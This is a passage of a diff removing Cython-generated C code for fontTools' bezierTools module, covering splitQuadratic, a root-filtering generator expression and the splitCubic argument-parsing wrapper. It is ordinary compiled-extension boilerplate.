__PYX_ERR(0, 546, __pyx_L1_error) - #endif - if (__pyx_t_2 >= __pyx_temp) break; - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - __pyx_t_4 = PyTuple_GET_ITEM(__pyx_t_1, __pyx_t_2); __Pyx_INCREF(__pyx_t_4); __pyx_t_2++; if (unlikely((0 < 0))) __PYX_ERR(0, 546, __pyx_L1_error) - #else - __pyx_t_4 = __Pyx_PySequence_ITEM(__pyx_t_1, __pyx_t_2); __pyx_t_2++; if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 546, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - #endif - } - } else { - __pyx_t_4 = __pyx_t_3(__pyx_t_1); - if (unlikely(!__pyx_t_4)) { - PyObject* exc_type = PyErr_Occurred(); - if (exc_type) { - if (likely(__Pyx_PyErr_GivenExceptionMatches(exc_type, PyExc_StopIteration))) PyErr_Clear(); - else __PYX_ERR(0, 546, __pyx_L1_error) - } - break; - } - __Pyx_GOTREF(__pyx_t_4); - } - __Pyx_XGOTREF(__pyx_cur_scope->__pyx_v_t); - __Pyx_XDECREF_SET(__pyx_cur_scope->__pyx_v_t, __pyx_t_4); - __Pyx_GIVEREF(__pyx_t_4); - __pyx_t_4 = 0; - __pyx_t_4 = PyObject_RichCompare(__pyx_int_0, __pyx_cur_scope->__pyx_v_t, Py_LE); __Pyx_XGOTREF(__pyx_t_4); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 546, __pyx_L1_error) - if (__Pyx_PyObject_IsTrue(__pyx_t_4)) { - __Pyx_DECREF(__pyx_t_4); - __pyx_t_4 = PyObject_RichCompare(__pyx_cur_scope->__pyx_v_t, __pyx_int_1, Py_LT); __Pyx_XGOTREF(__pyx_t_4); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 546, __pyx_L1_error) - } - __pyx_t_5 = __Pyx_PyObject_IsTrue(__pyx_t_4); if (unlikely((__pyx_t_5 < 0))) __PYX_ERR(0, 546, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - if (__pyx_t_5) { - if (unlikely(__Pyx_ListComp_Append(__pyx_r, (PyObject*)__pyx_cur_scope->__pyx_v_t))) __PYX_ERR(0, 546, __pyx_L1_error) - } - } - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - CYTHON_MAYBE_UNUSED_VAR(__pyx_cur_scope); - - /* function exit code */ - goto __pyx_L0; - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_r); __pyx_r = 0; - __Pyx_Generator_Replace_StopIteration(0); - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_4); - __Pyx_AddTraceback("genexpr", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_L0:; - __Pyx_XGIVEREF(__pyx_r); - #if !CYTHON_USE_EXC_INFO_STACK - __Pyx_Coroutine_ResetAndClearException(__pyx_generator); - #endif - __pyx_generator->resume_label = -1; - __Pyx_Coroutine_clear((PyObject*)__pyx_generator); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":507 - * - * - * def splitQuadratic(pt1, pt2, pt3, where, isHorizontal): # <<<<<<<<<<<<<< - * """Split a quadratic Bezier curve at a given coordinate. - * - */ - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_26splitQuadratic(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_pt1, PyObject *__pyx_v_pt2, PyObject *__pyx_v_pt3, PyObject *__pyx_v_where, PyObject *__pyx_v_isHorizontal) { - PyObject *__pyx_v_a = NULL; - PyObject *__pyx_v_b = NULL; - PyObject *__pyx_v_c = NULL; - PyObject *__pyx_v_solutions = NULL; - PyObject *__pyx_gb_9fontTools_4misc_11bezierTools_14splitQuadratic_2generator2 = 0; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - int __pyx_t_4; - PyObject *__pyx_t_5 = NULL; - PyObject *__pyx_t_6 = NULL; - PyObject *(*__pyx_t_7)(PyObject *); - PyObject *__pyx_t_8 = NULL; - int __pyx_t_9; - int __pyx_t_10; - int __pyx_t_11; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("splitQuadratic", 1); - - /* "fontTools/misc/bezierTools.py":542 - * ((50, 50), (75, 50), (100, 0)) - * """ - * a, b, c = calcQuadraticParameters(pt1, pt2, pt3) # <<<<<<<<<<<<<< - * solutions = solveQuadratic( - * a[isHorizontal], b[isHorizontal], c[isHorizontal] - where - */ - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_calcQuadraticParameters); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 542, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = NULL; - __pyx_t_4 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_2))) { - __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_2); - if (likely(__pyx_t_3)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_2, function); - __pyx_t_4 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[4] = {__pyx_t_3, __pyx_v_pt1, __pyx_v_pt2, __pyx_v_pt3}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_4, 3+__pyx_t_4); - __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 542, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - } - if ((likely(PyTuple_CheckExact(__pyx_t_1))) || (PyList_CheckExact(__pyx_t_1))) { - PyObject* sequence = __pyx_t_1; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 3)) { - if (size > 3) __Pyx_RaiseTooManyValuesError(3); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 542, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_3 = PyTuple_GET_ITEM(sequence, 1); - __pyx_t_5 = PyTuple_GET_ITEM(sequence, 2); - } else { - __pyx_t_2 = PyList_GET_ITEM(sequence, 0); - __pyx_t_3 = PyList_GET_ITEM(sequence, 1); - __pyx_t_5 = PyList_GET_ITEM(sequence, 2); - } - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(__pyx_t_5); - #else - __pyx_t_2 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 542, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 542, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_5 = PySequence_ITEM(sequence, 2); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 542, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - #endif - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - } else { - Py_ssize_t index = -1; - __pyx_t_6 = PyObject_GetIter(__pyx_t_1); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 542, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_7 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_6); - index = 0; __pyx_t_2 = __pyx_t_7(__pyx_t_6); if (unlikely(!__pyx_t_2)) goto __pyx_L3_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - index = 1; __pyx_t_3 = __pyx_t_7(__pyx_t_6); if (unlikely(!__pyx_t_3)) goto __pyx_L3_unpacking_failed; - __Pyx_GOTREF(__pyx_t_3); - index = 2; __pyx_t_5 = __pyx_t_7(__pyx_t_6); if (unlikely(!__pyx_t_5)) goto __pyx_L3_unpacking_failed; - __Pyx_GOTREF(__pyx_t_5); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_7(__pyx_t_6), 3) < 0) __PYX_ERR(0, 542, __pyx_L1_error) - __pyx_t_7 = NULL; - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - goto __pyx_L4_unpacking_done; - __pyx_L3_unpacking_failed:; - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __pyx_t_7 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 542, __pyx_L1_error) - __pyx_L4_unpacking_done:; - } - __pyx_v_a = __pyx_t_2; - __pyx_t_2 = 0; - __pyx_v_b = __pyx_t_3; - __pyx_t_3 = 0; - __pyx_v_c = __pyx_t_5; - __pyx_t_5 = 0; - - /* "fontTools/misc/bezierTools.py":543 - * """ - * a, b, c = calcQuadraticParameters(pt1, pt2, pt3) - * solutions = solveQuadratic( # <<<<<<<<<<<<<< - * a[isHorizontal], b[isHorizontal], c[isHorizontal] - where - * ) - */ - __Pyx_GetModuleGlobalName(__pyx_t_5, __pyx_n_s_solveQuadratic); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 543, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - - /* "fontTools/misc/bezierTools.py":544 - * a, b, c = calcQuadraticParameters(pt1, pt2, pt3) - * solutions = solveQuadratic( - * a[isHorizontal], b[isHorizontal], c[isHorizontal] - where # <<<<<<<<<<<<<< - * ) - * solutions = sorted(t for t in solutions if 0 <= t < 1) - */ - __pyx_t_3 = __Pyx_PyObject_GetItem(__pyx_v_a, __pyx_v_isHorizontal); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 544, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_2 = __Pyx_PyObject_GetItem(__pyx_v_b, __pyx_v_isHorizontal); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 544, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_6 = __Pyx_PyObject_GetItem(__pyx_v_c, __pyx_v_isHorizontal); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 544, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __pyx_t_8 = PyNumber_Subtract(__pyx_t_6, __pyx_v_where); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 544, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __pyx_t_6 = NULL; - __pyx_t_4 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_5))) { - __pyx_t_6 = PyMethod_GET_SELF(__pyx_t_5); - if (likely(__pyx_t_6)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_5); - __Pyx_INCREF(__pyx_t_6); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_5, function); - __pyx_t_4 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[4] = {__pyx_t_6, __pyx_t_3, __pyx_t_2, __pyx_t_8}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_5, __pyx_callargs+1-__pyx_t_4, 3+__pyx_t_4); - __Pyx_XDECREF(__pyx_t_6); __pyx_t_6 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 543, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - } - __pyx_v_solutions = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":546 - * a[isHorizontal], b[isHorizontal], c[isHorizontal] - where - * ) - * solutions = sorted(t for t in solutions if 0 <= t < 1) # <<<<<<<<<<<<<< - * if not solutions: - * return [(pt1, pt2, pt3)] - */ - __pyx_t_5 = __pyx_pf_9fontTools_4misc_11bezierTools_14splitQuadratic_genexpr(NULL, __pyx_v_solutions); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 546, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __pyx_t_8 = __Pyx_Generator_Next(__pyx_t_5); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 546, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __pyx_t_1 = ((PyObject*)__pyx_t_8); - __pyx_t_8 = 0; - __pyx_t_9 = PyList_Sort(__pyx_t_1); if (unlikely(__pyx_t_9 == ((int)-1))) __PYX_ERR(0, 546, __pyx_L1_error) - __Pyx_DECREF_SET(__pyx_v_solutions, __pyx_t_1); - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":547 - * ) - * solutions = sorted(t for t in solutions if 0 <= t < 1) - * if not solutions: # <<<<<<<<<<<<<< - * return [(pt1, pt2, pt3)] - * return _splitQuadraticAtT(a, b, c, *solutions) - */ - __pyx_t_10 = __Pyx_PyObject_IsTrue(__pyx_v_solutions); if (unlikely((__pyx_t_10 < 0))) __PYX_ERR(0, 547, __pyx_L1_error) - __pyx_t_11 = (!__pyx_t_10); - if (__pyx_t_11) { - - /* "fontTools/misc/bezierTools.py":548 - * solutions = sorted(t for t in solutions if 0 <= t < 1) - * if not solutions: - * return [(pt1, pt2, pt3)] # <<<<<<<<<<<<<< - * return _splitQuadraticAtT(a, b, c, *solutions) - * - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_1 = PyTuple_New(3); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 548, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_INCREF(__pyx_v_pt1); - __Pyx_GIVEREF(__pyx_v_pt1); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_v_pt1)) __PYX_ERR(0, 548, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_pt2); - __Pyx_GIVEREF(__pyx_v_pt2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_v_pt2)) __PYX_ERR(0, 548, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_pt3); - __Pyx_GIVEREF(__pyx_v_pt3); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 2, __pyx_v_pt3)) __PYX_ERR(0, 548, __pyx_L1_error); - __pyx_t_8 = PyList_New(1); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 548, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - __Pyx_GIVEREF(__pyx_t_1); - if (__Pyx_PyList_SET_ITEM(__pyx_t_8, 0, __pyx_t_1)) __PYX_ERR(0, 548, __pyx_L1_error); - __pyx_t_1 = 0; - __pyx_r = __pyx_t_8; - __pyx_t_8 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":547 - * ) - * solutions = sorted(t for t in solutions if 0 <= t < 1) - * if not solutions: # <<<<<<<<<<<<<< - * return [(pt1, pt2, pt3)] - * return _splitQuadraticAtT(a, b, c, *solutions) - */ - } - - /* "fontTools/misc/bezierTools.py":549 - * if not solutions: - * return [(pt1, pt2, pt3)] - * return _splitQuadraticAtT(a, b, c, *solutions) # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - __Pyx_GetModuleGlobalName(__pyx_t_8, __pyx_n_s_splitQuadraticAtT); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 549, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - __pyx_t_1 = PyTuple_New(3); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 549, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_INCREF(__pyx_v_a); - __Pyx_GIVEREF(__pyx_v_a); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_v_a)) __PYX_ERR(0, 549, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_b); - __Pyx_GIVEREF(__pyx_v_b); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_v_b)) __PYX_ERR(0, 549, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_c); - __Pyx_GIVEREF(__pyx_v_c); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 2, __pyx_v_c)) __PYX_ERR(0, 549, __pyx_L1_error); - __pyx_t_5 = __Pyx_PySequence_Tuple(__pyx_v_solutions); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 549, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __pyx_t_2 = PyNumber_Add(__pyx_t_1, __pyx_t_5); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 549, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __pyx_t_5 = __Pyx_PyObject_Call(__pyx_t_8, __pyx_t_2, NULL); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 549, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_r = __pyx_t_5; - __pyx_t_5 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":507 - * - * - * def splitQuadratic(pt1, pt2, pt3, where, isHorizontal): # <<<<<<<<<<<<<< - * """Split a quadratic Bezier curve at a given coordinate. - * - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_5); - __Pyx_XDECREF(__pyx_t_6); - __Pyx_XDECREF(__pyx_t_8); - __Pyx_AddTraceback("fontTools.misc.bezierTools.splitQuadratic", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XDECREF(__pyx_v_a); - __Pyx_XDECREF(__pyx_v_b); - __Pyx_XDECREF(__pyx_v_c); - __Pyx_XDECREF(__pyx_v_solutions); - __Pyx_XDECREF(__pyx_gb_9fontTools_4misc_11bezierTools_14splitQuadratic_2generator2); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":552 - * - * - * def splitCubic(pt1, pt2, pt3, pt4, where, isHorizontal): # <<<<<<<<<<<<<< - * """Split a cubic Bezier curve at a given coordinate. - * - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_29splitCubic(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_28splitCubic, "splitCubic(pt1, pt2, pt3, pt4, where, isHorizontal)\nSplit a cubic Bezier curve at a given coordinate.\n\n Args:\n pt1,pt2,pt3,pt4: Control points of the Bezier as 2D tuples.\n where: Position at which to split the curve.\n isHorizontal: Direction of the ray splitting the curve. If true,\n ``where`` is interpreted as a Y coordinate; if false, then\n ``where`` is interpreted as an X coordinate.\n\n Returns:\n A list of two curve segments (each curve segment being four 2D tuples)\n if the curve was successfully split, or a list containing the original\n curve.\n\n Example::\n\n >>> printSegments(splitCubic((0, 0), (25, 100), (75, 100), (100, 0), 150, False))\n ((0, 0), (25, 100), (75, 100), (100, 0))\n >>> printSegments(splitCubic((0, 0), (25, 100), (75, 100), (100, 0), 50, False))\n ((0, 0), (12.5, 50), (31.25, 75), (50, 75))\n ((50, 75), (68.75, 75), (87.5, 50), (100, 0))\n >>> printSegments(splitCubic((0, 0), (25, 100), (75, 100), (100, 0), 25, True))\n ((0, 0), (2.29379, 9.17517), (4.79804, 17.5085), (7.47414, 25))\n ((7.47414, 25), (31.2886, 91.6667), (68.7114, 91.6667), (92.5259, 25))\n ((92.5259, 25), (95.202, 17.5085), (97.7062, 9.17517), (100, 1.77636e-15))\n "); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_29splitCubic = {"splitCubic", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_29splitCubic, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_28splitCubic}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_29splitCubic(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_pt1 = 0; - PyObject *__pyx_v_pt2 = 0; - PyObject *__pyx_v_pt3 = 0; - PyObject *__pyx_v_pt4 = 0; - PyObject *__pyx_v_where = 0; - PyObject *__pyx_v_isHorizontal = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[6] = {0,0,0,0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("splitCubic (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pt1,&__pyx_n_s_pt2,&__pyx_n_s_pt3,&__pyx_n_s_pt4,&__pyx_n_s_where,&__pyx_n_s_isHorizontal,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 6: values[5] = __Pyx_Arg_FASTCALL(__pyx_args, 5); - CYTHON_FALLTHROUGH; - case 5: values[4] = __Pyx_Arg_FASTCALL(__pyx_args, 4); - CYTHON_FALLTHROUGH; - case 4: values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - CYTHON_FALLTHROUGH; - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt1)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 552, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt2)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 552, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("splitCubic", 1, 6, 6, 1); __PYX_ERR(0, 552, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt3)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 552, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("splitCubic", 1, 6, 6, 2); __PYX_ERR(0, 552, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 3: - if (likely((values[3] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt4)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[3]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 552, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("splitCubic", 1, 6, 6, 3); __PYX_ERR(0, 552, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 4: - if (likely((values[4] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_where)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[4]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 552, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("splitCubic", 1, 6, 6, 4); __PYX_ERR(0, 552, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 5: - if (likely((values[5] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_isHorizontal)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[5]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 552, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("splitCubic", 1, 6, 6, 5); __PYX_ERR(0, 552, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "splitCubic") < 0)) __PYX_ERR(0, 552, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 6)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - values[4] = __Pyx_Arg_FASTCALL(__pyx_args, 4); - values[5] = __Pyx_Arg_FASTCALL(__pyx_args, 5); - } - __pyx_v_pt1 = values[0]; - __pyx_v_pt2 = values[1]; - __pyx_v_pt3 = values[2]; - __pyx_v_pt4 = values[3]; - __pyx_v_where = values[4]; - __pyx_v_isHorizontal = values[5]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("splitCubic", 1, 6, 6, __pyx_nargs); __PYX_ERR(0, 552, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools.splitCubic", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_28splitCubic(__pyx_self, __pyx_v_pt1, __pyx_v_pt2, __pyx_v_pt3, __pyx_v_pt4, __pyx_v_where, __pyx_v_isHorizontal); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} -static PyObject *__pyx_gb_9fontTools_4misc_11bezierTools_10splitCubic_2generator3(__pyx_CoroutineObject *__pyx_generator, CYTHON_UNUSED PyThreadState *__pyx_tstate, PyObject *__pyx_sent_value); /* proto */ - -/* "fontTools/misc/bezierTools.py":583 - * a[isHorizontal], b[isHorizontal], c[isHorizontal], d[isHorizontal] - where - * ) - * solutions = sorted(t for t in solutions if 0 <= t < 1) # <<<<<<<<<<<<<< - * if not solutions: - * return [(pt1, pt2, pt3, pt4)] - */ - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_10splitCubic_genexpr(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_genexpr_arg_0) { - struct __pyx_obj_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr *__pyx_cur_scope; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int 